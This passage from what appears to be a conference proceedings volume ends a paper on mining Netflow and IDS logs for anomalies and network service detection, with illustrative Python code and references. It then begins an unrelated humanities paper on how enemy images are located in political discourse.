environments, and these patterns describe commonly occurring irrelevant alerts.<br />
For investigating the properties of organizational Netflow logs, we studied the log of a Netflow probe that<br />
was deployed in a backbone network of a large financial institution. The probe collected information about<br />
network traffic for hundreds of workstations, tens of servers and various other devices without packet<br />
sampling. The log of the probe covered a period of 14 days and contained 104,142,530 Netflow<br />
records. In order to detect changes in network usage patterns over time, we divided the 14 day (336<br />
hour) log into 336 non-overlapping time frames, with each frame covering 1 hour. In the remainder of the<br />
paper, destination address denotes the following tuple: (transport protocol ID, destination IP address,<br />
destination port). Note that Netflow records for portless transport protocols (like ICMP) might use the<br />
destination port field for specifying the type of the packet.<br />
Firstly, we noticed that the number of distinct destination addresses is quite large for each time frame –<br />
each frame contained an average of 309,948 records and an average of 103,335 destination addresses.<br />
However, the majority of destination addresses (90-98%, an average of 92.6% per frame) were<br />
associated with only one source IP address. Also, most such destination addresses appeared only in a<br />
few records during a short period of time. Furthermore, only 47-121 destination addresses had 20 or more<br />
source IP addresses in a frame, but 35-46% of Netflow records represented the network traffic to these<br />
few destinations. When we investigated these destination addresses more closely, we found that they<br />
correspond to widely used network services (for example, corporate mail and web servers). Due to the<br />
large volume of traffic going to these services, strong patterns that reflect this traffic show up in Netflow<br />
logs.<br />
Secondly, when analyzing the network traffic of workstations, we discovered that a typical workstation<br />
communicates with a limited number of IP addresses within a 1 hour time frame – the average number of<br />
peer addresses per workstation ranged from 9.8 to 24.7 in the 336 frames. Thirdly, we also found that many<br />
workstations often communicate only with well-known network services which are simultaneously used by<br />
several other network nodes. Inspecting 1 hour time frames revealed that 68-94% of workstations (an<br />
average of 88.3% per frame) interacted only with network services used by at least 4 other nodes during<br />
the same time frame. Other researchers have observed similar regularities in workstation network traffic<br />
(McHugh and Gates 2003).<br />
These properties of Netflow log data for organizational networks clearly indicate that such logs contain<br />
strong patterns. Furthermore, these patterns often reflect the use of well-known network services (by<br />
workstations and other legitimate clients). For these reasons, the emergence of new and unusual<br />
patterns might be a symptom of anomalous (and possibly malicious) network activity. In addition, the<br />
discovery of network services from Netflow logs facilitates the identification of illegal services. In the<br />
following section we will present several algorithms for addressing these issues.<br />
4. Anomaly detection algorithms for Netflow and IDS logs<br />
4.1 Frequent pattern mining from Netflow logs<br />
In order to mine patterns from Netflow logs, we propose a frequent itemset mining based approach.<br />
Although frequent itemset mining algorithms have often been suggested for various log types<br />
(see (Vaarandi 2004) for references), their application to Netflow data sets is fairly novel and we are<br />
aware of only a few recent works (Vaarandi 2008; Paredes-Oliva, Dimitritopoulos, Molina, Barlet-Ros and<br />
Brauckhoff 2010; Li and Deng 2010).<br />
Let I = {i1,...,in} be a set of items. If X ⊆ I, X is called an itemset. A transaction is a tuple (tid, X), where tid<br />
is a transaction identifier and X is an itemset. A transaction database D is a set of transactions, and the<br />
support of an itemset X is the number of transactions that contain X: supp(X) = |{tid | (tid, Y) ∈ D, X ⊆ Y}|.<br />
If s is a support threshold and supp(X) ≥ s, X is called a frequent itemset. Note that if the support<br />
threshold is specified as a percentage p%, then s = |D|*p/100. If itemset X does not have any proper<br />
supersets with the same support, X is called a closed itemset. In this paper, we focus on mining frequent<br />
closed itemsets, since they are a compact and lossless representation of all frequent itemsets.<br />
For mining patterns from Netflow logs, we are using the LogHound data mining tool which has been<br />
developed for efficient mining of very large logs (Vaarandi 2004). If a Netflow record reflects a flow of m<br />
network packets between some source and destination transport address, we view this record as a set of<br />
m transactions with the identical itemset {(sourceIP,1), (sourcePort,2), (destinationIP,3), (destinationPort,4),<br />
(protocol,5)}. In other words, we order the five relevant flow record attributes, in order to distinguish<br />
identical values of different attributes during the mining. With this representation, each itemset describes<br />
a traffic pattern, and the support of the itemset equals the number of packets for this pattern. In the rest<br />
of the paper, we use the terms pattern and itemset interchangeably. Figure 1 depicts some frequent<br />
traffic patterns detected with LogHound.<br />
* * 10.16.23.3 162 17<br />
Support: 161657<br />
10.12.47.1 993 * * 6<br />
Support: 166959<br />
10.13.25.14 80 10.11.48.44 1915 6<br />
Support: 1211532<br />
Figure 1: Sample traffic patterns detected with LogHound<br />
The first pattern reveals that 161,657 UDP packets have been sent from various sources to the SNMP trap<br />
collector (port 162/udp) at 10.16.23.3, while the second pattern reflects 166,959 TCP packets sent to<br />
various destinations from the secure IMAP server (port 993/tcp) at 10.12.47.1. The third pattern indicates that<br />
port 1915/tcp at the node 10.11.48.44 has received 1,211,532 TCP packets from the web server (port<br />
80/tcp) at 10.13.25.14.<br />
For mining traffic patterns from Netflow data, we propose the following framework. After every time interval<br />
of W seconds, frequent closed patterns are detected from the Netflow data of the last W seconds and stored to<br />
a file on disk. The content of the file can be viewed over the web by the security administrators for getting a quick<br />
overview of the most prominent recent network traffic patterns. In addition, for each detected pattern the last<br />
N pattern files are scanned, in order to detect in how many files the pattern is present. If the pattern has<br />
occurred in less than K files, the pattern is highlighted as potentially anomalous.<br />
We have implemented this framework for analyzing data from a Netflow probe in a backbone network of<br />
a large financial institution (see section 3 for the probe deployment details). We measured the algorithm<br />
performance during 21 days, with the support threshold set to 1%, W set to 3600 seconds, N set to 96<br />
and K to 12. In other words, the algorithm mined patterns once every hour, and highlighted each<br />
pattern which had occurred in less than twelve 1-hour windows during the last 4 days. During the<br />
experiment, 56-261 patterns were detected (an average of 182.5 per window), and 3-140 patterns were<br />
highlighted (an average of 54.3 per window). All highlighted patterns corresponded to system and<br />
network management activity which does not occur routinely on an everyday basis. Thus the algorithm is<br />
able to identify unusual strong network traffic patterns.<br />
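An added illustration of the itemset representation and the W/N/K highlighting step described above; it is not the paper's code and not LogHound (the miner is brute-force subset enumeration over a handful of constructed flow records), and the same functions serve the IDS alert pattern mining of section 4.3.

```python
from collections import defaultdict
from itertools import combinations

# Constructed sample Netflow records, not taken from the paper's data set:
# (source IP, source port, destination IP, destination port, protocol ID, packets)
FLOWS = [
    ("10.2.1.13", 21892, "10.1.1.1", 80, 6, 40),
    ("10.2.1.14", 33001, "10.1.1.1", 80, 6, 35),
    ("10.2.1.15", 40123, "10.1.1.1", 80, 6, 30),
    ("10.2.1.13", 50000, "10.16.23.3", 162, 17, 5),
    ("10.2.1.99", 50001, "10.16.23.3", 162, 17, 4),
    ("10.2.1.13", 21893, "10.1.1.2", 443, 6, 2),
]


def flow_items(flow):
    """Map a flow record to the paper's itemset {(sourceIP,1), ..., (protocol,5)}.

    The position tag keeps identical values of different attributes apart
    (e.g. port 80 as source port versus port 80 as destination port)."""
    return frozenset((value, pos + 1) for pos, value in enumerate(flow[:5]))


def mine_closed_patterns(flows, support_pct):
    """Return {itemset: support} for the frequent closed itemsets of the flows.

    A flow of m packets counts as m transactions with the same itemset, so the
    support of a pattern is the number of packets matching it. The threshold
    s = |D| * p / 100 is taken over the total packet count. This is brute-force
    subset enumeration (5 attributes give 31 subsets per record), not the
    LogHound algorithm."""
    total_packets = sum(flow[5] for flow in flows)
    threshold = total_packets * support_pct / 100
    support = defaultdict(int)
    for flow in flows:
        items = sorted(flow_items(flow), key=lambda item: item[1])
        for size in range(1, len(items) + 1):
            for subset in combinations(items, size):
                support[frozenset(subset)] += flow[5]
    frequent = {x: s for x, s in support.items() if s >= threshold}
    # closed: no proper superset has the same support (such a superset, if it
    # exists, is itself frequent, so searching `frequent` is sufficient)
    return {
        x: s for x, s in frequent.items()
        if not any(y > x and support[y] == s for y in frequent)
    }


def format_pattern(itemset):
    """Render an itemset in the Figure 1 style: positions 1..5, '*' for absent attributes."""
    by_pos = {pos: value for value, pos in itemset}
    return " ".join(str(by_pos.get(pos, "*")) for pos in range(1, 6))


def highlight_rare(patterns, pattern_files, n, k):
    """Highlight patterns that occur in fewer than k of the last n pattern files.

    pattern_files is the list of earlier windows' pattern sets, oldest first;
    the paper's experiment used W=3600 s, N=96 and K=12."""
    recent = pattern_files[-n:]
    return {p for p in patterns if sum(p in f for f in recent) < k}


if __name__ == "__main__":
    closed = mine_closed_patterns(FLOWS, 10)
    for pattern, supp in sorted(closed.items(), key=lambda kv: -kv[1]):
        print(format_pattern(pattern), "Support:", supp)
```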
4.2 Network service detection from Netflow logs<br />
Identification of network services in organizational networks is an important task. Firstly, new legitimate<br />
services are discovered, which eases the configuration management process. Secondly, unexpected or<br />
illegal services might be found that violate security policies or have been created with malicious intentions<br />
(e.g., for leaking data to the Internet). Today, network services are often detected with dedicated<br />
network/host scanning tools like Nmap. However, scanning larger networks is time-consuming and<br />
requires a lot of network bandwidth. In addition, scanning is an intrusive technique which might alert the<br />
illegal service provider. Furthermore, scanning could trigger many alarms in the security monitoring<br />
system of the organization itself (e.g., host firewalls might report all their ports that were scanned).<br />
Finally, the illegal service might be protected with a firewall, denying access for known security<br />
monitoring hosts.<br />
The approach proposed in section 4.1 is able to identify actively used network services which receive or<br />
send large amounts of network packets. However, in many cases the amount of data sent and received<br />
by services is modest. For example, during our experiments described in section 4.1 we discovered that<br />
many services exchanged fewer packets with clients than the support threshold, and thus remained<br />
undetected. Unfortunately, lowering the support threshold will substantially increase the number of<br />
patterns, thus making it hard for a human analyst to spot patterns that correspond to services. Furthermore,<br />
mining large data sets with very low support thresholds will also increase the CPU and memory<br />
consumption of the algorithm.<br />
In this section, we propose a non-intrusive algorithm for real-time service detection from Netflow logs.<br />
The algorithm processes Netflow records immediately after their arrival at the network monitoring server,<br />
and employs the following heuristic – if the destination address is employed for providing an actively used<br />
service, this address is likely to show up in Netflow logs repeatedly during longer periods of time. In<br />
contrast, as discussed in section 3, most destination addresses appear only in a few records during a short<br />
time.<br />
The algorithm employs memory based lists L0,…,Ln for destination address analysis, where each list is<br />
allocated for destination addresses with a certain number of associated source IP addresses. For each<br />
list Li, Wi specifies the size of the analysis window in seconds and Ti the threshold for the number of sources<br />
(Tn is set to infinity; Ti < Ti+1 and Wi ≤ Wi+1, 0 ≤ i < n). These lists allow for treating more widely used<br />
destination addresses differently during the analysis, and are also useful for grouping purposes<br />
during reporting.<br />
For each incoming Netflow record, the algorithm applies the following steps:<br />
1) extracts the source IP address S and destination address D from the Netflow record,<br />
2) if D belongs to list Li, S is appended to the peer list PD; if during the last Wi seconds Ti distinct entries<br />
were appended to PD, D is moved to list Li+1,<br />
3) if D is not present in lists L0,…,Ln, D is inserted into list L0 and S is appended to PD.<br />
After short time intervals (e.g., once a second), the algorithm checks all destination addresses. If the<br />
destination address D belongs to Li, entries appended to PD more than Wi seconds ago are removed for<br />
memory saving purposes. Also, if the destination address D belongs to list Li (0 < i ≤ n) and during the<br />
last Wi seconds less than Ti-1 distinct entries were appended to PD, D is moved to list Li-1. If the<br />
destination address D belongs to L0 and during the last W0 seconds no entries were added to PD, D is<br />
removed from L0.<br />
It is easy to see that if the destination address is actively used by a larger number of sources, it will be<br />
promoted to higher level lists, while if the number of active peers decreases, the address will be moved<br />
back to lower levels. If an address in L0 has been without peers for W0 seconds, it will be dropped from<br />
memory. Otherwise it will stay in one of the lists and have a chance for promotion if its peer activity<br />
increases. If T0 is set to 2, L0 will contain destination addresses with only one associated source during<br />
the last W0 seconds. Since the majority of destination addresses do not correspond to network services<br />
and appear briefly in a few records with one source only (see section 3), they will only stay in L0, being<br />
dropped shortly after W0 seconds. Therefore, the algorithm will not consume large amounts of memory.<br />
During our experiments, we have used the value of 3600 seconds for W0, which represents a good<br />
tradeoff between low memory consumption and service detection precision. We have also set n to 3, W1<br />
to 7200 seconds, both W2 and W3 to 1440 seconds, T0 to 2, T1 to 5, and T2 to 20. In other words, we<br />
have used four lists for destination addresses with 1 source during 1 hour, with 2-4 sources during 2<br />
hours, with 5-19 sources during 4 hours, and with 20 or more sources during 4 hours.<br />
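The list-based service detection procedure above (steps 1-3, the periodic check, and the K-second L0 rule), as an added example written for this page rather than the paper's implementation; the source IPs are constructed, and W2 and W3 are taken as the 4 hour windows the prose describes.

```python
import math
from collections import deque


class ServiceDetector:
    """Destination address lists L0..Ln from section 4.2.

    windows[i] is W_i in seconds and thresholds[i] is T_i for i < n; T_n is
    infinity, so a destination in L_n is never promoted further. A destination
    address is the tuple (protocol ID, destination IP, destination port)."""

    def __init__(self, windows, thresholds):
        if len(windows) != len(thresholds) + 1:
            raise ValueError("need W_0..W_n and T_0..T_(n-1)")
        self.windows = list(windows)
        self.thresholds = list(thresholds) + [math.inf]
        self.level = {}       # destination address D -> index i of its list L_i
        self.peers = {}       # D -> deque of (timestamp, source IP), i.e. P_D
        self.first_seen = {}  # D -> time D was inserted into L0

    def _distinct_sources(self, dest, now, window):
        return len({src for ts, src in self.peers[dest] if now - ts <= window})

    def process_record(self, now, src, dest):
        """Steps 1-3 for one Netflow record; returns the list index D ends up in."""
        if dest not in self.level:                 # step 3: unknown D goes to L0
            self.level[dest] = 0
            self.peers[dest] = deque()
            self.first_seen[dest] = now
        self.peers[dest].append((now, src))        # step 2: append S to P_D
        i = self.level[dest]
        if self._distinct_sources(dest, now, self.windows[i]) >= self.thresholds[i]:
            self.level[dest] = i + 1               # T_i distinct peers in W_i: promote
        return self.level[dest]

    def housekeeping(self, now):
        """The periodic check (e.g. once per second): expire, demote, drop."""
        for dest in list(self.level):
            i = self.level[dest]
            pd = self.peers[dest]
            while pd and now - pd[0][0] > self.windows[i]:
                pd.popleft()                       # entries older than W_i
            distinct = len({src for _, src in pd})
            if i > 0 and distinct < self.thresholds[i - 1]:
                self.level[dest] = i - 1           # fewer than T_(i-1) peers: demote
            elif i == 0 and not pd:
                del self.level[dest], self.peers[dest], self.first_seen[dest]

    def persistent_single_peer(self, now, k):
        """L0 destinations that have stayed there more than k seconds (the paper's K)."""
        return [d for d, i in self.level.items()
                if i == 0 and now - self.first_seen[d] > k]


if __name__ == "__main__":
    # Parameters from the paper: W0 = 3600, W1 = 7200, W2 = W3 = 4 hours (14400 s),
    # T0 = 2, T1 = 5, T2 = 20; the source IPs below are constructed.
    det = ServiceDetector([3600, 7200, 14400, 14400], [2, 5, 20])
    web = (6, "10.1.1.1", 80)
    for t, src in enumerate(["10.2.1.13", "10.2.1.14", "10.2.1.15", "10.2.1.16", "10.2.1.17"]):
        print("t=%d level=%d" % (t * 10, det.process_record(t * 10, src, web)))
```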
We have configured the algorithm to produce output in several ways:<br />
A web report is created once every 5 minutes from destinations in lists L1,…,Ln,<br />
When a new destination is created in L1 or an entry has stayed in L0 for more than K seconds, a<br />
syslog message is produced about the appearance of a new service (we have set K to 86400, in order<br />
to detect services which have been consistently used by one peer during 1 day).<br />
During the experiment of 14 days, the memory consumption of the algorithm was low, as we had<br />
expected. The L0, L1, L2, and L3 lists remained limited in size and contained 1054-3845, 95-445, 7-75,<br />
and 45-133 entries, respectively. Also, 6381 syslog messages about the appearance of new services<br />
were logged. However, 3267 (59%) of them were repeated messages about 656 well-known services (in<br />
most cases, services were rediscovered after nightly peer inactivity). Among the remaining 3114 messages,<br />
some were false positives generated by a few network management hosts – since these nodes poll<br />
the network intensively over SNMP, UDP ports are sometimes reused for creating client sockets, thus these<br />
ports enter the L1 list and are reported. We believe that if service syslog messages are correlated further,<br />
their number could be reduced several times and false positives could be eliminated.<br />
4.3 Frequent pattern mining from IDS logs<br />
As discussed in section 2, most data mining based algorithms for IDS log analysis have been developed<br />
for distinguishing important events from false positives and other background noise. However, in their<br />
recent works Viinikka, Debar, Mé et al. have argued that it is equally important to detect unanticipated<br />
changes in alarm flows (Viinikka, Debar, Mé and Séguier 2006; Viinikka, Debar, Mé, Lehikoinen and<br />
Tarvainen 2009). Since the algorithm presented in section 4.1 detects unexpected strong patterns from<br />
Netflow logs, we also propose this algorithm for IDS log analysis. In this section, we will briefly describe<br />
the experiment results for IDS logs.<br />
As with Netflow logs, after every W seconds the algorithm mines frequent closed patterns from the<br />
IDS log data of the last W seconds. Patterns are both stored to a file and used for creating a web report. Also,<br />
patterns which appear in less than K of the last N pattern files are highlighted.<br />
We have applied the algorithm to an IDS sensor of a large financial institution, with the sensor being<br />
deployed at the outer network perimeter. We measured the algorithm performance during 32 days, with<br />
the support threshold set to 10, W set to 3600 seconds, N set to 96 and K to 12. During the experiment,<br />
5-187 patterns were detected (an average of 22.2 per window), and 0-175 patterns were highlighted (an<br />
average of 6.4 per window). Figure 2 presents some highlighted alert patterns (for privacy reasons,<br />
IP addresses have been obfuscated).<br />
1:2009414 TCP 10.175.178.182 * 10.1.1.1 80<br />
1:2001219 TCP 10.55.173.56 * * 22<br />
1:474 ICMP 10.37.237.66 – 10.1.1.1 –<br />
Figure 2: Sample highlighted IDS alert patterns<br />
The first pattern reflects the Nkiller2 DoS attack from 10.175.178.182 against the company web server,<br />
while the second pattern indicates a horizontal SSH scan from 10.55.173.56. The third pattern<br />
corresponds to an ICMP echo scan flood from 10.37.237.66 against the company web server. During the<br />
experiments, we found that the algorithm is able to highlight many strong and unexpected attack patterns,<br />
and also provide a concise overview of the latest attack trends for the security administrator.<br />
5. Conclusion<br />
In this paper, we have presented a study of important properties of IDS and Netflow data sets. We have<br />
also proposed several algorithms for IDS and Netflow log analysis.<br />
For future work, we plan to employ statistical algorithms for measuring unexpected changes in the supports<br />
of commonly occurring frequent alert and network traffic patterns. We also intend to elaborate the service<br />
detection algorithm and augment it with event correlation methods. In particular, we are considering the<br />
creation of Simple Event Correlator (Vaarandi 2006) rules for suppressing repeated service messages<br />
and for verifying with specifically crafted test packets whether destination addresses are responding to connection<br />
attempts. Finally, our research agenda includes work on workstation traffic anomaly detection, employing<br />
some of the methods described in this paper.<br />
References<br />
Al-Mamory, S.O., Zhang, H. and Abbas, A.R. (2008) “IDS Alarms Reduction Using Data Mining”, Proceedings of<br />
2008 IEEE World Congress on Computational Intelligence, pp. 3564-3570.<br />
Al-Mamory, S.O. and Zhang, H. (2009) “Intrusion Detection Alarms Reduction Using Root Cause Analysis and Clustering”, Computer Communications, vol. 32(2), pp. 419-430.
Clifton, C. and Gengo, G. (2000) “Developing Custom Intrusion Detection Filters Using Data Mining”, Proceedings of 2000 MILCOM Symposium, pp. 440-443.
Julisch, K. (2001) “Mining Alarm Clusters to Improve Alarm Handling Efficiency”, Proceedings of 2001 Annual Computer Security Applications Conference, pp. 12-21.
Julisch, K. (2003) “Clustering Intrusion Detection Alarms to Support Root Cause Analysis”, ACM Transactions on Information and System Security, vol. 6(4), pp. 443-471.
Julisch, K. and Dacier, M. (2002) “Mining Intrusion Detection Alarms for Actionable Knowledge”, Proceedings of 2002 ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 366-375.
Li, X. and Deng, Z.-H. (2010) “Mining Frequent Patterns from Network Flows for Monitoring Network”, Expert Systems with Applications, vol. 37(10), pp. 8850-8860.
Long, J., Schwartz, D. and Stoecklin, S. (2006) “Distinguishing False from True Alerts in Snort by Data Mining Patterns of Alerts”, Proceedings of 2006 SPIE Defense and Security Symposium, pp. 62410B-1--62410B-10.
McHugh, J. and Gates, C. (2003) “Locality: A New Paradigm for Thinking About Normal Behavior and Outsider Threat”, Proceedings of 2003 New Security Paradigms Workshop, pp. 3-10.
Morin, B. and Debar, H. (2003) “Correlation of Intrusion Symptoms: an Application of Chronicles”, Proceedings of 2003 RAID Symposium, pp. 94-112.
Ning, P., Cui, Y. and Reeves, D.S. (2002) “Analyzing Intensive Intrusion Alerts via Correlation”, Proceedings of 2002 RAID Symposium, pp. 74-94.
Paredes-Oliva, I., Dimitropoulos, X., Molina, M., Barlet-Ros, P. and Brauckhoff, D. (2010) “Automating Root-Cause Analysis of Network Anomalies Using Frequent Itemset Mining”, Proceedings of 2010 SIGCOMM Conference, pp. 467-468.
Pietraszek, T. (2004) “Using Adaptive Alert Classification to Reduce False Positives in Intrusion Detection”, Proceedings of 2004 RAID Symposium, pp. 102-124.
Taylor, T., Paterson, D., Glanfield, J., Gates, C., Brooks, S. and McHugh, J. (2009) “FloVis: Flow Visualization System”, Proceedings of 2009 Cybersecurity Applications and Technology Conference for Homeland Security, pp. 186-198.
Treinen, J.J. and Thurimella, R. (2006) “A Framework for the Application of Association Rule Mining in Large Intrusion Detection Infrastructures”, Proceedings of 2006 RAID Symposium, pp. 1-18.
Vaarandi, R. (2004) “A Breadth-First Algorithm for Mining Frequent Patterns from Event Logs”, Proceedings of 2004 IFIP International Conference on Intelligence in Communication Systems, pp. 293-308.
Vaarandi, R. (2006) “Simple Event Correlator for Real-Time Security Log Monitoring”, Hakin9 Magazine, vol. 1/2006 (6), pp. 28-39.
Vaarandi, R. (2008) “Mining Event Logs with SLCT and LogHound”, Proceedings of 2008 IEEE/IFIP Network Operations and Management Symposium, pp. 1071-1074.
Vaarandi, R. and Podiņš, K. (2010) “Network IDS Alert Classification with Frequent Itemset Mining and Data Clustering”, Proceedings of 2010 IEEE Conference on Network and Service Management, pp. 451-456.
Viinikka, J. and Debar, H. (2004) “Monitoring IDS Background Noise Using EWMA Control Charts and Alert Information”, Proceedings of 2004 RAID Symposium, pp. 166-187.
Viinikka, J., Debar, H., Mé, L., Lehikoinen, A. and Tarvainen, M. (2009) “Processing Intrusion Detection Alert Aggregates with Time Series Modeling”, Information Fusion Journal, vol. 10(4), pp. 312-324.
Viinikka, J., Debar, H., Mé, L. and Séguier, R. (2006) “Time Series Modeling for IDS Alert Management”, Proceedings of 2006 ACM Symposium on Information, Computer and Communications Security, pp. 102-113.
Wagner, A. (2008) Entropy-Based Worm Detection for Fast IP Networks, PhD Thesis, Swiss Federal Institute of Technology.
Wagner, C., Wagener, G., State, R., Engel, T. and Dulaunoy, A. (2010) “Game Theory Driven Monitoring of Spatial-Aggregated IP-Flow Records”, Proceedings of 2010 IEEE Conference on Network and Service Management, pp. 463-468.
Locating the Enemy
Marja Vuorinen
University of Helsinki, Finland
marja.vuorinen@helsinki.fi
Abstract: Enmity is structured discursively in several ways, focussing on different characteristics and producing
various sets of concepts. Some of them relate to concrete geographical locations, while others refer to more abstract
sociological and political notions. Some sets of concepts are completely separate from one another, while others are
strongly interrelated and even form interesting combinations. An Enemy differs from an Other basically by being
experienced as openly and actually threatening. When creating an Other, the unwanted features unsuitable for the
Good Self are moulded into a separate form that is usually considered relatively stable, distant (not imminently
threatening) and safe. An Enemy has a similar core, but it is considered actively menacing. Most often it is also
imagined (or perceived) as approaching: drawing nearer and eventually closing in. To discover an enemy one thus
has to define a) where it is supposed to be situated and whether or not it is moving closer, b) how close by it currently
is, and c) whether it operates openly or under cover. This paper explores the location-related concepts that are used
to define enmity in all their variety. It experiments with the idea of integrating them all into a single system, producing
a mental map of all the possible locations of potential enemy types. These include first the enemies from outside: the
traditional military enemies situated outside the borders of a sovereign state, most easily distinguished from one another
by compass point. The second species of enemies are the so-called intimate enemies – a concept coined by Vilho
Harle (2000) – residing within the same society but outside the defining group, and divided into sub-species such as
the sociological enemies threatening ‘from above’ and ‘from below’, the enemies of a movement standing
symbolically either behind or ahead of it, and the traditional political enemies from right to left. These sets of subtypes
interrelate in many ways, both obvious and unexpected. The third and most perilous enemy species is the internal
enemy, lurking inside the defining group itself, weakening it, sponging on it, or threatening it with sabotage, betrayal or
desertion. Examples of each enemy type are discussed in the paper – the geographical ones, due to the author’s
nationality, mainly from a Northern European perspective, but with excursions to a more general European and
Western experience.
Keywords: enemy images, location, politics, sociology, geography
1. Introduction
This paper came into being as an extended semantic joke: as an attempt at organising the figures of
speech pointing out the locations of particular enemies into a single system. By examining historical and
present-day enemies and comparing their actual and symbolic locations, it aims to form a preliminary
gallery of enemy types, through which other cases of enmity can be further analysed. Rhetorical samples
and historical cases serve as examples and illustrations. They are taken from previous research by
historians and social scientists, or formed through an ongoing observation of contemporary media.
Some of the enmities discussed below have their origin in the concrete circumstances of the physical
world, but have later been loaded with cultural connotations and consequently become institutionalised
into traditional conceptions. Some are metaphorical, abstracted from coincidental occurrence, while
others are by origin symbolic, i.e. agreement-based. How a certain enemy type is located when it is first
encountered greatly influences the way it is experienced and how it develops, as it gains attributes
from the previous enemies associated with the same location.
The defining in-group typically places itself in the centre of things. Different enemies are situated in
concentric zones around the defining centre. The outer circle is inhabited by the
geographic/political/military enemies of the state or nation, the enemies from outside. It can be further
divided into neighbouring states and others that are situated beyond the immediate neighbours or even
further away. In the next circle inwards are the intimate enemies: those who live within the same society
but outside the defining Self, e.g. ‘the nation’, a particular class or other ideologically conscious in-group.
This type of enemy is easily discerned and therefore relatively easy to deal with (Harle 2000: 35). The
most sinister case is the enemy within: an invisible threat hiding inside the in-group community, so far
unidentified and therefore very dangerous as a potential source of unsuspected aggression right in the
midst of Us.
The self-explanatory notion of placing the defining Self in the centre of things is susceptible to slight
alterations vis-à-vis the location of its definitional opposite. The defining in-group is not actually quite as
neutral a zero point as it likes to suggest: it is constantly re-moulded by the ideological opposites it
creates for itself. In the end image and counter-image create one another. They become understandable
only in their mutual relation (Harle 2000: 15–18).
An extreme way of marking intimate enemies apart is to compel them to wear a badge, e.g. a yellow Star
of David. A military enemy is recognized by alien uniform, equipment and/or ethnic features; its war
machinery is identifiable by model and insignia. This paper does not discuss such crude signals. Instead,
it discusses the inner characteristics given to imagined enemies, particularly vis-à-vis their symbolic or
actual location. Geographical enemies are examined, due to the author’s nationality, mainly from a
Northern European perspective, but with excursions to a more general European and Western
experience.
Enemy categories are discussed below as seen from outside, as instruments of negative identification: as
Others, who at a certain point of time have become somebody’s Enemies. What we are about to witness
are thus essentially distorted ways of thinking. Nothing is said about whether the perceived threats were
genuine or not. I will also refer to Us as the holders of the defining centre, representing a so-called ironic
we, an in-group identity that is imagined to be constant, but whose essence and position change as
enmities change.
2. How enemies are born and how they differ from others
Enmity and otherness, two identity-creating, identity-reversing concepts, have a lot in common. Every
enemy is an Other, but not all Others are enemies. The study of enemy images benefits greatly from
studies concerning otherness. What is said about imagined Others is equally true about imagined
Enemies.
The ideas of otherness/enmity are based on the social psychological concept of projection coined by
Sigmund Freud. Projection begins with splitting what is considered evil, weak or faulty apart from the
acceptable psychological and cultural features. The second stage is to remove the unwanted features
from the self by placing them into an Other (usually someone who actually is slightly different) in order to
mentally protect the self. A famous illustration of this phenomenon is the 19th-century concept of the
Orient. Edward Said (1978) demonstrates that the historical Orient was created by colonial Europeans as
a counter-image of everything Western, holding the features the westerners did not wish or dare to
include in their cherished self-image. Thus the relation between Self and Other is often construed as a
series of dichotomies, e.g. freedom vs. oppression, progress vs. reaction, peace vs. violence, law vs.
lawlessness, culture vs. anarchy/decadence, purity vs. dirt, health vs. sickness, ending with life vs. death
(Vuorinen 2002: 266–272; Ehrnrooth 1992: 365–483).
Creating Others/Enemies is done by establishing stereotypes. According to Stuart Hall (1999) they are
based on convenient exaggeration of select features. A multiform reality is forced into a few simple
patterns. The resulting banal categories influence how people belonging to a stereotyped group are
perceived. A vicious circle forms when negative presuppositions gain evidence through seemingly
spontaneous, neutral observation, making them seem natural and eternal.
Every community has members whose behaviour is less than perfect. This provides ground for negative
characterisation and makes the negative stereotypes appear partly true, making them vexingly long-lasting.
On the other hand, most enemy images are so loose-fitting that different enemies can be
described with similar attributes. Correspondingly, most in-group identities appear strikingly similar, with
only minor circumstance-related variations. Goodness, truth, righteousness, purity, proper manners, right
religion and good morals are the hallmarks of the Self. What is natural and normal, genuine and
legitimate, are always ‘our’ qualities (Harle 2000: 13).
The main difference between Enemy and Other is their supposed activeness/passiveness. When
unwanted features (such as weakness, amorality, stupidity, destructivity, aggression, dirtiness, lack of
organization, manners or ‘culture’) are projected away from the Self into an imagined Other, this set
of bad features is captured in a form that is both distant and stable, and located not only outside but
also below the Self. As a result the Other can be observed safely and is rarely perceived as actively
threatening (Said 1978). However, an Enemy cannot be trusted to keep its distance, but is suspected of
approaching in order to kill, destroy, damage and/or steal. The image of an enemy is essentially an
image of a threat – of unwanted acts towards the Self and of their consequences – and of the subsequent
need to remain vigilant, to plan defence or even to attack first.
Needless to say, an Enemy is not only threatening but also Evil, and capable of evil deeds. This
fundamental badness it has inherited from its conceptual predecessor, the Other. Imagining an Enemy is
a precondition to any contest, as it suggests a possibility and a practical means of deliverance (Mosca
1939: 280).
Discourses of enmity are created, maintained, negotiated and modified by the community. Enemy images
can of course appear spontaneously whenever there is a crisis involving separate groups. Nonetheless,
the most powerful, clear-cut images of enmity usually come into the world as conscious creations of
propaganda machinery, and are aggressively spread through available media. If they are accepted by the
community, they may become a permanent feature of popular thought, renewing itself within the culture.
Particularly acceptable are images that reinforce and unite the community by relieving pressure, e.g.
blaming some obvious social evil on an outside force (Klinge 1972: 57–131; Alapuro 1973; Vuorinen
2010a, 2010b).
When an enemy is imagined/perceived as approaching, it quickly becomes necessary to establish its
relative location vis-à-vis the Self – that is: from what direction and distance it threatens, and how soon.
Unlike an Other, who is usually located below the Self, an Enemy can approach from any direction.
3. Enemies from outside: The geographical compass rose
Enemies that threaten a society from outside the state borders are easy to label non-human. They are
ethnic and cultural strangers, fairly unknown, with little or no reliable first-hand information available. If
there is an ongoing military conflict, or imminent threat of one, i.e. if the danger caused by the enemy is
immediate and concrete, it is in the defending group’s best interest to strengthen its will to fight by
defining the enemy as non-human (Seppälä 2002: 55).
The archetypal eastern enemy of the Finnish popular imagery is the Russian/Soviet arch-enemy ryssä
(‘Ruskie’). In an inter-war period poem by Uuno Kailas, Rajalla (“On the frontier”, 1931; Kailas 1977: 239–
241), the enemy resembles a hostile force of nature. As a prose translation the poem goes like this:
“The border appears as a crack in the ice. In front of me spreads Asia, the East. Behind me
lie Europe and the West. I protect them as a guard. […] Dreary and cold is the winter’s night,
freezing the breath of the east. It reminds us of slavery and forced labour. The stars above
look upon the horror. Far away over the steppes rises the spectre of Ivan the Cruel, an
omen of destruction, heralding a bloody sunrise. […] Never shall the iron-shod feet of the
enemy step on the sacred soil where our heroes rest. Not while I protect my country! Never
shall a stranger wrest away our precious legacy! There is plenty of room here for those dogs
of the steppes: they’ll get buried in our soil! As a strong bear I will attack them, throw myself
at their spears, to protect the spinning-wheels of our women and the cradles of our children!”
